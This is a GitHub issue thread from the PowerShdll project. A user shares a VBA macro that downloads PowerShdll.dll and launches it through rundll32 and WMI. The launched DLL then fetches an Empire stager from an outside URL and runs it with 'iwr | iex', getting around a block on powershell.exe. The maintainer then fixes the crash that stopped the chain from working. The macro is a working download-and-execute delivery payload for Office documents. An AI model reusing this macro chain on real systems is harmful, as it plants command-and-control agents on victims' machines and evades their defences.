Execute PowerShdll from VBA macro

Question

Execute PowerShdll from VBA macro

vivami opened this issue 7 years ago · 4 comments

First of all: thanks for this awesome project!

I'm trying to execute PowerShdll via a VBA macro (client blocks powershell.exe, and I want an Empire agent), by first downloading the dll (DownloadDLL()) and then executing the downloaded PowerShdll.dll by letting it downloading a script to execute (Empire stager). This works when I execute StrCmd in a cmd.exe, but does not work when executing it via the following VBA script:

Public Function Debugging() As Variant
    DownloadDLL
    Dim StrCmd As String
    StrCmd = "C:\Windows\System32\rundll32.exe C:\Temp\PowerShdll.dll,main . { iwr -useb https://cl.ly/kgIa/stager.ps1 } ^| iex;"
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    objProcess.Create StrCmd, Null, objConfig, intProcessID
End Function

Sub DownloadDLL()

    Dim myURL As String
    myURL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x64/Release/PowerShdll.dll"

    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", myURL, False
    WinHttpReq.send

    myURL = WinHttpReq.responseBody
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile "C:\Temp\PowerShdll.dll", 2
        oStream.Close
    End If

End Sub

This results in the following error message:

Problem signature:
  Problem Event Name:	CLR20r3
  Problem Signature 01:	rundll32.exe
  Problem Signature 02:	6.3.9600.17415
  Problem Signature 03:	54504eb8
  Problem Signature 04:	mscorlib
  Problem Signature 05:	4.0.30319.36366
  Problem Signature 06:	57a0f7f9
  Problem Signature 07:	4528
  Problem Signature 08:	9a
  Problem Signature 09:	System.IO.IOException
  OS Version:	6.3.9600.2.0.0.272.7
  Locale ID:	1033
  Additional Information 1:	6ebd
  Additional Information 2:	6ebd833e076778d4646eaf22a3f76243
  Additional Information 3:	e34d
  Additional Information 4:	e34d4e50642e55705797b1cdfa61a4c5

Any clue as to how I can fix this? Thanks in advance!

Answer 1 · 2017-05-30T23:11:27.000Z

I think I understand the problem. I used a trick to show the command output inside the current shell.
Basically, it steals the calling process' console and writes to it. In this context there is no shell so it will not work.
I will add an option to not show output.

Answer 2 · 2017-05-31T00:44:26.000Z

I added the -n switch to not redirect output. Should be ok now.
Please confirm.

Answer 3 · 2017-05-31T06:47:41.000Z

Thanks! It works now, also without the -n switch.

Answer 4 · 2017-05-31T06:51:03.000Z

I moved the console hijacking bit after the script execution, so I assume it would crash after the command has been executed.